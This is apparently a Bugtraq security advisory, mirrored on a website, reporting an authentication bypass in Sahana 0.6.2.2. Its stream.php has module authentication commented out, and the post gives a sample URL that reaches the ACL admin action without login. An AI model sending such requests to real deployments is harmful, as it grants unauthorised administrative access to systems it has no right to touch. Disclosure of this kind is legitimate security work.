Sahana 0.6.2.2 Authentication Bypass

From: Christopher <vooduhal@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Sahana 0.6.2.2 Authentication Bypass
Date:


Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.